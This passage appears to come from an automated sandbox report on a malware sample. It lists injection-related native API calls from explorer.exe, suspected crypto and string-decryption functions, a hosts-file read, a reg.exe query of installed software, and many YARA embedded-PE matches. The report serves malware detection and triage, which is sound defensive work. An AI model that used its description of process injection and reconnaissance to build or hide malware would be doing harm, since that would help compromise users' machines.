Source: C:\Windows\explorer.exe	Code function: 2_2_015630D0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_015630D0
Source: C:\Windows\explorer.exe	Code function: 2_2_015618C4 NtWriteVirtualMemory,	2_2_015618C4
Source: C:\Windows\explorer.exe	Code function: 2_2_015618F0 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_015618F0
Source: C:\Windows\explorer.exe	Code function: 2_2_01561898 NtReadVirtualMemory,	2_2_01561898
Source: C:\Windows\explorer.exe	Code function: 2_2_0156BF7B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,	2_2_0156BF7B
Source: C:\Windows\explorer.exe	Code function: 2_2_0156BF3C NtMapViewOfSection,RtlNtStatusToDosError,	2_2_0156BF3C
Source: C:\Windows\explorer.exe	Code function: 2_2_01560FBC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	2_2_01560FBC
Source: C:\Windows\explorer.exe	Code function: 2_2_01561803 NtQuerySystemInformation,RtlNtStatusToDosError,	2_2_01561803
Source: C:\Windows\explorer.exe	Code function: 2_2_0156135C memset,NtQueryInformationProcess,	2_2_0156135C
Source: C:\Windows\explorer.exe	Code function: 2_2_01560AAA NtQueryInformationProcess,	2_2_01560AAA
Source: C:\Windows\explorer.exe	Code function: 2_2_015A0248 LdrLoadDll,NtProtectVirtualMemory,NtProtectVirtualMemory,	2_2_015A0248

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_00404204	0_2_00404204
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_004012EF	0_2_004012EF
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_004060FB	0_1_004060FB
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_004315C9	0_1_004315C9
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040B0C4	0_1_0040B0C4
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00433122	0_1_00433122
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00442269	0_1_00442269
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0044A236	0_1_0044A236
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040C360	0_1_0040C360
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040B376	0_1_0040B376
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042D37C	0_1_0042D37C
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040B31B	0_1_0040B31B
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_004213EA	0_1_004213EA
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00419400	0_1_00419400
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040B4E2	0_1_0040B4E2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042B4FE	0_1_0042B4FE
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_004414A7	0_1_004414A7
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00433557	0_1_00433557
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0044B5F6	0_1_0044B5F6
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042D681	0_1_0042D681
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042E7C2	0_1_0042E7C2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042C7E4	0_1_0042C7E4
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0044A7A6	0_1_0044A7A6
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00431860	0_1_00431860
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00432816	0_1_00432816
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_004398DB	0_1_004398DB
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0043398C	0_1_0043398C
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00443ABF	0_1_00443ABF
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0042BCEF	0_1_0042BCEF
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00432D0A	0_1_00432D0A
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0044AD16	0_1_0044AD16
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040DE10	0_1_0040DE10
Source: C:\Windows\explorer.exe	Code function: 2_2_01565013	2_2_01565013
Source: C:\Windows\explorer.exe	Code function: 2_2_0154482F	2_2_0154482F
Source: C:\Windows\explorer.exe	Code function: 2_2_0156D0BC	2_2_0156D0BC
Source: C:\Windows\explorer.exe	Code function: 2_2_01544B2B	2_2_01544B2B
Source: C:\Windows\explorer.exe	Code function: 2_2_01563BFD	2_2_01563BFD
Source: C:\Windows\explorer.exe	Code function: 2_2_01544A0A	2_2_01544A0A
Source: C:\Windows\explorer.exe	Code function: 2_2_01559A33	2_2_01559A33
Source: C:\Windows\explorer.exe	Code function: 2_2_01559543	2_2_01559543
Source: C:\Windows\explorer.exe	Code function: 2_2_01557DD0	2_2_01557DD0
Source: C:\Windows\explorer.exe	Code function: 2_2_01543400	2_2_01543400
Source: C:\Windows\explorer.exe	Code function: 2_2_01558FB0	2_2_01558FB0
Source: C:\Windows\explorer.exe	Code function: 2_2_01558FAF	2_2_01558FAF
Source: C:\Windows\explorer.exe	Code function: 2_2_0155B6F4	2_2_0155B6F4
Source: C:\Windows\explorer.exe	Code function: 2_2_015A084A	2_2_015A084A
Source: C:\Windows\explorer.exe	Code function: 2_2_015C526B	2_2_015C526B
Source: C:\Windows\explorer.exe	Code function: 2_2_015B9208	2_2_015B9208
Source: C:\Windows\explorer.exe	Code function: 2_2_015B9207	2_2_015B9207
Source: C:\Windows\explorer.exe	Code function: 2_2_015A4A87	2_2_015A4A87
Source: C:\Windows\explorer.exe	Code function: 2_2_015BBDDC	2_2_015BBDDC
Source: C:\Windows\explorer.exe	Code function: 2_2_015A4D83	2_2_015A4D83
Source: C:\Windows\explorer.exe	Code function: 2_2_015A4C62	2_2_015A4C62
Source: C:\Windows\explorer.exe	Code function: 2_2_015B9C8B	2_2_015B9C8B
Source: C:\Windows\explorer.exe	Code function: 2_2_015B979B	2_2_015B979B
Source: C:\Windows\explorer.exe	Code function: 2_2_015C3E55	2_2_015C3E55
Source: C:\Windows\explorer.exe	Code function: 2_2_015A3613	2_2_015A3613

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 0041B780 appears 33 times
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 0041B9A0 appears 91 times
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 004391D0 appears 50 times
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 0041B170 appears 109 times
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 00432414 appears 36 times
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: String function: 0041B3B0 appears 63 times

PE file contains strange resources

Show sources

Source: rb5iJg6pgN.exe

Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample file is different than original file name gathered from version info

Show sources

Source: rb5iJg6pgN.exe	Binary or memory string: OriginalFilename vs rb5iJg6pgN.exe
Source: rb5iJg6pgN.exe, 00000000.00000002.1499833844.002D0000.00000008.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs rb5iJg6pgN.exe
Source: rb5iJg6pgN.exe	Binary or memory string: OriginalFilenameWorker. vs rb5iJg6pgN.exe

Uses reg.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s

Yara signature match

Show sources

Source: rb5iJg6pgN.exe, type: SAMPLE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000000.1467280177.00400000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000001.1467651208.00400000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.1499833844.002D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.1499976703.00400000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.1486070629.01620000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.1543921572.00060000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.1544091557.00650000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.1544074903.00630000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1499473775.00060000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1499698657.00440000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1501425872.016F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502801306.01D30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502827811.01D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502842638.01DA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502889959.01E00000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502878957.01DF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1502536161.01A20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1503029285.02020000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1507679611.02BA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1507689530.02BC0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1507943848.02D40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1507950533.02D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1507991377.02DE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508015150.02E20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508035531.02E60000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508020629.02E30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508119677.03020000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508132762.03080000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508179226.03130000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508183860.03140000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508802180.035F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508810634.03600000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1508897767.03AF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1509255440.03C20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510641728.03D80000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510698102.03E20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510826926.03EE0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510791092.03EB0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510705859.03E40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510762006.03E90000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510778872.03EA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510661452.03DE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510834757.03EF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510878677.03F70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1509201484.03B70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1509319448.03C30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1510996422.04150000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1511065722.042C0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1516367336.070E0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1509998222.03CC0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1526476296.016F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1528350249.01D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1528282321.01D30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1529056137.01E00000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1528914237.01DF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1529414366.02020000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534115502.02BA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534129692.02BC0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534313551.02D40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534334049.02D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1528641544.01DA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534425716.02E20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534481919.02E60000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534585823.03020000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534437822.02E30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534605501.03080000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534672142.03130000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534679802.03140000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1524597638.00440000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1524475486.00060000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1514376422.05310000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1535904797.03AF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1534388387.02DE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536709172.03D80000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536750248.03E20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1535812569.035F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536757874.03E40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536809625.03EB0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536825861.03EE0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536800241.03EA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536870913.03F70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1527805844.01A20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1537045293.042C0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536075349.03C30000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536732103.03DE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536026873.03C20000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1535821910.03600000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536791257.03E90000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1535957747.03B70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536833113.03EF0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000002.1659326612.001E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000018.00000002.1694019901.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000001D.00000002.1710546118.001A0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000022.00000002.1734565185.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
